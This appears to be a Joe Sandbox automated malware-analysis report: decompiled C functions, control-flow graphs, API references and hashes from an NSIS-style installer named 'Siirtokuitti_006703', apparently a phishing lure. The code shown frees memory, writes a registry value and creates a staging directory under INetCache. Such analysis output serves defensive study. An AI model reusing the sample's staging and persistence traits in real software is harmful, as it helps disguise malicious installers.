                                                                                                                      • API String ID: 1716503409-4282445333
                                                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                      • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                      • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 769 10001759-10001795 call 10001b18 773 100018a6-100018a8 769->773 774 1000179b-1000179f 769->774 775 100017a1-100017a7 call 10002286 774->775 776 100017a8-100017b5 call 100022d0 774->776 775->776 781 100017e5-100017ec 776->781 782 100017b7-100017bc 776->782 783 1000180c-10001810 781->783 784 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 781->784 785 100017d7-100017da 782->785 786 100017be-100017bf 782->786 789 10001812-1000184c call 100015b4 call 100024a4 783->789 790 1000184e-10001854 call 100024a4 783->790 810 10001855-10001859 784->810 785->781 791 100017dc-100017dd call 10002b57 785->791 787 100017c1-100017c2 786->787 788 100017c7-100017c8 call 1000289c 786->788 794 100017c4-100017c5 787->794 795 100017cf-100017d5 call 10002640 787->795 801 100017cd 788->801 789->810 790->810 804 100017e2 791->804 794->781 794->788 809 100017e4 795->809 801->804 804->809 809->781 813 10001896-1000189d 810->813 814 1000185b-10001869 call 10002467 810->814 813->773 817 1000189f-100018a0 GlobalFree 813->817 819 10001881-10001888 814->819 820 1000186b-1000186e 814->820 817->773 819->813 822 1000188a-10001895 call 1000153d 819->822 820->819 821 10001870-10001878 820->821 821->819 823 1000187a-1000187b FreeLibrary 821->823 822->813 823->819
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				void _v36;
                                                                                                                      				struct HINSTANCE__* _t34;
                                                                                                                      				intOrPtr _t38;
                                                                                                                      				void* _t44;
                                                                                                                      				void* _t45;
                                                                                                                      				void* _t46;
                                                                                                                      				void* _t50;
                                                                                                                      				intOrPtr _t53;
                                                                                                                      				signed int _t57;
                                                                                                                      				signed int _t61;
                                                                                                                      				void* _t65;
                                                                                                                      				void* _t66;
                                                                                                                      				void* _t70;
                                                                                                                      				void* _t74;
                                                                                                                      
                                                                                                                      				_t74 = __esi;
                                                                                                                      				_t66 = __edi;
                                                                                                                      				_t65 = __edx;
                                                                                                                      				 *0x1000406c = _a8;
                                                                                                                      				 *0x10004070 = _a16;
                                                                                                                      				 *0x10004074 = _a12;
                                                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
                                                                                                                      				_push("true"); // executed
                                                                                                                      				_t34 = E10001B18(); // executed
                                                                                                                      				_t50 = _t34;
                                                                                                                      				if(_t50 == 0) {
                                                                                                                      					L28:
                                                                                                                      					return _t34;
                                                                                                                      				} else {
                                                                                                                      					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                                      						E10002286(_t50);
                                                                                                                      					}
                                                                                                                      					_push(_t50);
                                                                                                                      					E100022D0(_t65);
                                                                                                                      					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                                                                                      					if(_t53 == 0xffffffff) {
                                                                                                                      						L14:
                                                                                                                      						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
                                                                                                                      							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                                                                                      								_t34 = E100024A4(_t50);
                                                                                                                      							} else {
                                                                                                                      								_push(_t74);
                                                                                                                      								_push(_t66);
                                                                                                                      								_t12 = _t50 + 0x1018; // 0x1018
                                                                                                                      								_t57 = 8;
                                                                                                                      								memcpy( &_v36, _t12, _t57 << 2);
                                                                                                                      								_t38 = E100015B4(_t50);
                                                                                                                      								_t15 = _t50 + 0x1018; // 0x1018
                                                                                                                      								_t70 = _t15;
                                                                                                                      								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
                                                                                                                      								 *_t70 = 4;
                                                                                                                      								E100024A4(_t50);
                                                                                                                      								_t61 = 8;
                                                                                                                      								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E100024A4(_t50);
                                                                                                                      							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
                                                                                                                      						}
                                                                                                                      						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                                      							_t34 = E10002467(_t50);
                                                                                                                      							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                                                                                      								_t34 =  *(_t50 + 0x1008);
                                                                                                                      								if(_t34 != 0) {
                                                                                                                      									_t34 = FreeLibrary(_t34);
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
                                                                                                                      								_t34 = E1000153D( *0x10004068);
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
                                                                                                                      							goto L28;
                                                                                                                      						} else {
                                                                                                                      							return GlobalFree(_t50);
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					_t44 =  *_t50;
                                                                                                                      					if(_t44 == 0) {
                                                                                                                      						if(_t53 != 1) {
                                                                                                                      							goto L14;
                                                                                                                      						}
                                                                                                                      						E10002B57(_t50);
                                                                                                                      						L12:
                                                                                                                      						_t50 = _t44;
                                                                                                                      						L13:
                                                                                                                      						goto L14;
                                                                                                                      					}
                                                                                                                      					_t45 = _t44 - 1;
                                                                                                                      					if(_t45 == 0) {
                                                                                                                      						L8:
                                                                                                                      						_t44 = E1000289C(_t53, _t50); // executed
                                                                                                                      						goto L12;
                                                                                                                      					}
                                                                                                                      					_t46 = _t45 - 1;
                                                                                                                      					if(_t46 == 0) {
                                                                                                                      						E10002640(_t50);
                                                                                                                      						goto L13;
                                                                                                                      					}
                                                                                                                      					if(_t46 != 1) {
                                                                                                                      						goto L14;
                                                                                                                      					}
                                                                                                                      					goto L8;
                                                                                                                      				}
                                                                                                                      			}

















                                                                                                                      0x10001759
                                                                                                                      0x10001759
                                                                                                                      0x10001759
                                                                                                                      0x10001763
                                                                                                                      0x1000176b
                                                                                                                      0x10001778
                                                                                                                      0x10001786
                                                                                                                      0x10001789
                                                                                                                      0x1000178b
                                                                                                                      0x10001790
                                                                                                                      0x10001795
                                                                                                                      0x100018a8
                                                                                                                      0x100018a8
                                                                                                                      0x1000179b
                                                                                                                      0x1000179f
                                                                                                                      0x100017a2
                                                                                                                      0x100017a7
                                                                                                                      0x100017a8
                                                                                                                      0x100017a9
                                                                                                                      0x100017af
                                                                                                                      0x100017b5
                                                                                                                      0x100017e5
                                                                                                                      0x100017ec
                                                                                                                      0x10001810
                                                                                                                      0x1000184f
                                                                                                                      0x10001812
                                                                                                                      0x10001812
                                                                                                                      0x10001813
                                                                                                                      0x10001816
                                                                                                                      0x1000181c
                                                                                                                      0x10001820
                                                                                                                      0x10001823
                                                                                                                      0x10001828
                                                                                                                      0x10001828
                                                                                                                      0x1000182f
                                                                                                                      0x10001835
                                                                                                                      0x1000183b
                                                                                                                      0x10001847
                                                                                                                      0x10001848
                                                                                                                      0x1000184b
                                                                                                                      0x100017ee
                                                                                                                      0x100017ef
                                                                                                                      0x10001804
                                                                                                                      0x10001804
                                                                                                                      0x10001859
                                                                                                                      0x1000185c
                                                                                                                      0x10001869
                                                                                                                      0x10001870
                                                                                                                      0x10001878
                                                                                                                      0x1000187b
                                                                                                                      0x1000187b
                                                                                                                      0x10001878
                                                                                                                      0x10001888
                                                                                                                      0x10001890
                                                                                                                      0x10001895
                                                                                                                      0x10001888
                                                                                                                      0x1000189d
                                                                                                                      0x00000000
                                                                                                                      0x1000189f
                                                                                                                      0x00000000
                                                                                                                      0x100018a0
                                                                                                                      0x1000189d
                                                                                                                      0x100017b9
                                                                                                                      0x100017bc
                                                                                                                      0x100017da
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100017dd
                                                                                                                      0x100017e2
                                                                                                                      0x100017e2
                                                                                                                      0x100017e4
                                                                                                                      0x00000000
                                                                                                                      0x100017e4
                                                                                                                      0x100017be
                                                                                                                      0x100017bf
                                                                                                                      0x100017c7
                                                                                                                      0x100017c8
                                                                                                                      0x00000000
                                                                                                                      0x100017c8
                                                                                                                      0x100017c1
                                                                                                                      0x100017c2
                                                                                                                      0x100017d0
                                                                                                                      0x00000000
                                                                                                                      0x100017d0
                                                                                                                      0x100017c5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100017c5

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                                                        • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                                      • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                      • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                                                      • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                      • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 826 4023de-40240f call 402c37 * 2 call 402cc7 833 402415-40241f 826->833 834 402abf-402ace 826->834 836 402421-40242e call 402c37 lstrlenW 833->836 837 402432-402435 833->837 836->837 840 402437-402448 call 402c15 837->840 841 402449-40244c 837->841 840->841 842 40245d-402471 RegSetValueExW 841->842 843 40244e-402458 call 4031ba 841->843 848 402473 842->848 849 402476-402557 RegCloseKey 842->849 843->842 848->849 849->834
                                                                                                                      C-Code - Quality: 85%
                                                                                                                      			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
                                                                                                                      				void* _t20;
                                                                                                                      				void* _t21;
                                                                                                                      				int _t24;
                                                                                                                      				long _t25;
                                                                                                                      				char _t27;
                                                                                                                      				int _t30;
                                                                                                                      				void* _t32;
                                                                                                                      				intOrPtr _t33;
                                                                                                                      				void* _t34;
                                                                                                                      				intOrPtr _t37;
                                                                                                                      				void* _t39;
                                                                                                                      				void* _t42;
                                                                                                                      
                                                                                                                      				_t33 = __edx;
                                                                                                                      				_t30 = __ebx;
                                                                                                                      				_t37 =  *((intOrPtr*)(_t39 - 0x18));
                                                                                                                      				_t34 = __eax;
                                                                                                                      				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
                                                                                                                      				 *(_t39 - 0x3c) = E00402C37(2);
                                                                                                                      				_t20 = E00402C37(0x11);
                                                                                                                      				 *(_t39 - 4) = 1;
                                                                                                                      				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
                                                                                                                      				 *(_t39 + 8) = _t21;
                                                                                                                      				if(_t21 != __ebx) {
                                                                                                                      					_t24 = 0;
                                                                                                                      					if(_t37 == 1) {
                                                                                                                      						E00402C37(0x23);
                                                                                                                      						_t24 = lstrlenW(0x40b5d8) + _t29 + 2;
                                                                                                                      					}
                                                                                                                      					if(_t37 == 4) {
                                                                                                                      						_t27 = E00402C15(3);
                                                                                                                      						_pop(_t32);
                                                                                                                      						 *0x40b5d8 = _t27;
                                                                                                                      						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
                                                                                                                      						_t24 = _t37;
                                                                                                                      					}
                                                                                                                      					if(_t37 == 3) {
                                                                                                                      						_t24 = E004031BA(_t32,  *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d8, 0x1800); // executed
                                                                                                                      					}
                                                                                                                      					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d8, _t24); // executed
                                                                                                                      					if(_t25 == 0) {
                                                                                                                      						 *(_t39 - 4) = _t30;
                                                                                                                      					}
                                                                                                                      					_push( *(_t39 + 8));
                                                                                                                      					RegCloseKey(); // executed
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                      				return 0;
                                                                                                                      			}















                                                                                                                      0x004023de
                                                                                                                      0x004023de
                                                                                                                      0x004023de
                                                                                                                      0x004023e1
                                                                                                                      0x004023e8
                                                                                                                      0x004023f2
                                                                                                                      0x004023f5
                                                                                                                      0x004023fe
                                                                                                                      0x00402405
                                                                                                                      0x0040240c
                                                                                                                      0x0040240f
                                                                                                                      0x00402415
                                                                                                                      0x0040241f
                                                                                                                      0x00402423
                                                                                                                      0x0040242e
                                                                                                                      0x0040242e
                                                                                                                      0x00402435
                                                                                                                      0x00402439
                                                                                                                      0x0040243e
                                                                                                                      0x0040243f
                                                                                                                      0x00402445
                                                                                                                      0x00402448
                                                                                                                      0x00402448
                                                                                                                      0x0040244c
                                                                                                                      0x00402458
                                                                                                                      0x00402458
                                                                                                                      0x00402469
                                                                                                                      0x00402471
                                                                                                                      0x00402473
                                                                                                                      0x00402473
                                                                                                                      0x00402476
                                                                                                                      0x00402551
                                                                                                                      0x00402551
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl3DD.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl3DD.tmp
                                                                                                                      • API String ID: 2655323295-1538330047
                                                                                                                      • Opcode ID: 697ca6fc33c722e931f9849be810c6938a60cd4556a36a8b5a34e3a2b808b9dc
                                                                                                                      • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                                                                                      • Opcode Fuzzy Hash: 697ca6fc33c722e931f9849be810c6938a60cd4556a36a8b5a34e3a2b808b9dc
                                                                                                                      • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E004015C1(short __ebx, void* __eflags) {
                                                                                                                      				void* _t17;
                                                                                                                      				int _t23;
                                                                                                                      				void* _t25;
                                                                                                                      				signed char _t26;
                                                                                                                      				short _t28;
                                                                                                                      				short _t31;
                                                                                                                      				short* _t34;
                                                                                                                      				void* _t36;
                                                                                                                      
                                                                                                                      				_t28 = __ebx;
                                                                                                                      				 *(_t36 + 8) = E00402C37(0xfffffff0);
                                                                                                                      				_t17 = E00405D2C(_t16);
                                                                                                                      				_t32 = _t17;
                                                                                                                      				if(_t17 != __ebx) {
                                                                                                                      					do {
                                                                                                                      						_t34 = E00405CAE(_t32, 0x5c);
                                                                                                                      						_t31 =  *_t34;
                                                                                                                      						 *_t34 = _t28;
                                                                                                                      						if(_t31 != _t28) {
                                                                                                                      							L5:
                                                                                                                      							_t25 = E00405960( *(_t36 + 8));
                                                                                                                      						} else {
                                                                                                                      							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                                                                                                      							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040597D(_t42) == 0) {
                                                                                                                      								goto L5;
                                                                                                                      							} else {
                                                                                                                      								_t25 = E004058E3( *(_t36 + 8)); // executed
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						if(_t25 != _t28) {
                                                                                                                      							if(_t25 != 0xb7) {
                                                                                                                      								L9:
                                                                                                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                      							} else {
                                                                                                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                                                      								if((_t26 & 0x00000010) == 0) {
                                                                                                                      									goto L9;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						 *_t34 = _t31;
                                                                                                                      						_t32 = _t34 + 2;
                                                                                                                      					} while (_t31 != _t28);
                                                                                                                      				}
                                                                                                                      				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                                                                                                      					_push(0xfffffff5);
                                                                                                                      					E00401423();
                                                                                                                      				} else {
                                                                                                                      					E00401423(0xffffffe6);
                                                                                                                      					E004063B0(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost\\mos\\Ensileringen",  *(_t36 + 8));
                                                                                                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                                                      					if(_t23 == 0) {
                                                                                                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}











                                                                                                                      0x004015c1
                                                                                                                      0x004015c9
                                                                                                                      0x004015cc
                                                                                                                      0x004015d1
                                                                                                                      0x004015d5
                                                                                                                      0x004015d7
                                                                                                                      0x004015df
                                                                                                                      0x004015e1
                                                                                                                      0x004015e4
                                                                                                                      0x004015ea
                                                                                                                      0x00401604
                                                                                                                      0x00401607
                                                                                                                      0x004015ec
                                                                                                                      0x004015ec
                                                                                                                      0x004015ef
                                                                                                                      0x00000000
                                                                                                                      0x004015fa
                                                                                                                      0x004015fd
                                                                                                                      0x004015fd
                                                                                                                      0x004015ef
                                                                                                                      0x0040160e
                                                                                                                      0x00401615
                                                                                                                      0x00401624
                                                                                                                      0x00401624
                                                                                                                      0x00401617
                                                                                                                      0x0040161a
                                                                                                                      0x00401622
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00401622
                                                                                                                      0x00401615
                                                                                                                      0x00401627
                                                                                                                      0x0040162b
                                                                                                                      0x0040162c
                                                                                                                      0x004015d7
                                                                                                                      0x00401634
                                                                                                                      0x00401663
                                                                                                                      0x00402245
                                                                                                                      0x00401636
                                                                                                                      0x00401638
                                                                                                                      0x00401645
                                                                                                                      0x0040164d
                                                                                                                      0x00401655
                                                                                                                      0x0040165b
                                                                                                                      0x0040165b
                                                                                                                      0x00401655
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75832EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75832EE0,00000000), ref: 00405D3A
                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                        • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost\mos\Ensileringen,?,00000000,000000F0), ref: 0040164D
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost\mos\Ensileringen, xrefs: 00401640
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Standpost\mos\Ensileringen
                                                                                                                      • API String ID: 1892508949-2402935249
                                                                                                                      • Opcode ID: c840ecc83acf5020046f42496966d140c6f87948540d69156687245e3a2f46c2
                                                                                                                      • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                                                                      • Opcode Fuzzy Hash: c840ecc83acf5020046f42496966d140c6f87948540d69156687245e3a2f46c2
                                                                                                                      • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00405388(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                      				long _t9;
                                                                                                                      				int _t15;
                                                                                                                      				long _t16;
                                                                                                                      
                                                                                                                      				_t15 = _a8;
                                                                                                                      				if(_t15 != 0x102) {
                                                                                                                      					if(_t15 != 0x200) {
                                                                                                                      						_t16 = _a16;
                                                                                                                      						L7:
                                                                                                                      						if(_t15 == 0x419 &&  *0x423714 != _t16) {
                                                                                                                      							_push(_t16);
                                                                                                                      							_push(6);
                                                                                                                      							 *0x423714 = _t16;
                                                                                                                      							E00404D5E();
                                                                                                                      						}
                                                                                                                      						L11:
                                                                                                                      						_t9 = CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16); // executed
                                                                                                                      						return _t9;
                                                                                                                      					}
                                                                                                                      					if(IsWindowVisible(_a4) == 0) {
                                                                                                                      						L10:
                                                                                                                      						_t16 = _a16;
                                                                                                                      						goto L11;
                                                                                                                      					}
                                                                                                                      					_t16 = E00404CDE(_a4, "true");
                                                                                                                      					_t15 = 0x419;
                                                                                                                      					goto L7;
                                                                                                                      				}
                                                                                                                      				if(_a12 != 0x20) {
                                                                                                                      					goto L10;
                                                                                                                      				}
                                                                                                                      				E00404391(0x413);
                                                                                                                      				return 0;
                                                                                                                      			}






                                                                                                                      0x0040538c
                                                                                                                      0x00405396
                                                                                                                      0x004053b2
                                                                                                                      0x004053d4
                                                                                                                      0x004053d7
                                                                                                                      0x004053dd
                                                                                                                      0x004053e7
                                                                                                                      0x004053e8
                                                                                                                      0x004053ea
                                                                                                                      0x004053f0
                                                                                                                      0x004053f0
                                                                                                                      0x004053fa
                                                                                                                      0x00405408
                                                                                                                      0x00000000
                                                                                                                      0x00405408
                                                                                                                      0x004053bf
                                                                                                                      0x004053f7
                                                                                                                      0x004053f7
                                                                                                                      0x00000000
                                                                                                                      0x004053f7
                                                                                                                      0x004053cb
                                                                                                                      0x004053cd
                                                                                                                      0x00000000
                                                                                                                      0x004053cd
                                                                                                                      0x0040539c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004053a3
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 004053B7
                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405408
                                                                                                                        • Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
